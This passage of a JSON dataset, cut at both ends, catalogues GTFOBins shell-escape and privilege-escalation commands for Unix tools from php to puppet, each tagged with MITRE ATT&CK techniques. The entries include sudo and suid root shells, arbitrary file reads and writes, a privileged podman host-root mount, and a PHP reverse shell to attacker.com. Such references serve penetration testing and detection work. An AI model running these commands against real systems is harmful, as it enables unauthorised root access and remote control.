'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-write:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:reverse-shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); $h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\", [\"-p\"]);'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:shell:3:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:sudo","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:suid","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:upload:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:pic:file-read:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:file-read:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:file-read:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pic:shell:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"]},{"id":"gtfo:pidstat:shell:0:sudo","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pidstat:shell:0:suid","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pidstat:shell:0:unprivileged","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pidstat/"]},{"id":"gtfo:pip:inherit:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:inherit:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:shell:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pip:shell:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"]},{"id":"gtfo:pipx:inherit:0:sudo","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pipx/"]},{"id":"gtfo:pipx:inherit:0:unprivileged","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pipx/"]},{"id":"gtfo:pkexec:shell:0:sudo","toolId":"gtfo:pkexec","toolName":"pkexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pkexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkexec/"]},{"id":"gtfo:pkg:command:0:sudo","toolId":"gtfo:pkg","toolName":"pkg","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"pkg install -y --no-repo-update ./x-1.0.txz","description":"Generate the FreeBSD package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t freebsd -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkg/"]},{"id":"gtfo:plymouth:shell:0:sudo","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:plymouth:shell:0:suid","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command='/bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:plymouth:shell:0:unprivileged","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/plymouth/"]},{"id":"gtfo:podman:shell:0:sudo","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/podman/"]},{"id":"gtfo:podman:shell:0:unprivileged","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/podman/"]},{"id":"gtfo:poetry:inherit:0:sudo","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/poetry/"]},{"id":"gtfo:poetry:inherit:0:unprivileged","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/poetry/"]},{"id":"gtfo:posh:shell:0:sudo","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/posh/"]},{"id":"gtfo:posh:shell:0:unprivileged","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/posh/"]},{"id":"gtfo:pr:file-read:0:sudo","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:pr:file-read:0:suid","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:pr:file-read:0:unprivileged","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:procmail:command:0:sudo","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/procmail/"]},{"id":"gtfo:procmail:command:0:unprivileged","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/procmail/"]},{"id":"gtfo:pry:inherit:0:sudo","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pry/"]},{"id":"gtfo:pry:inherit:0:unprivileged","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pry/"]},{"id":"gtfo:psftp:shell:0:sudo","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psftp:shell:0:suid","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psftp:shell:0:unprivileged","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psql:inherit:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:inherit:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:inherit:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:ptx:file-read:0:sudo","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:ptx:file-read:0:suid","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:ptx:file-read:0:unprivileged","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:puppet:file-read:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-read:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is 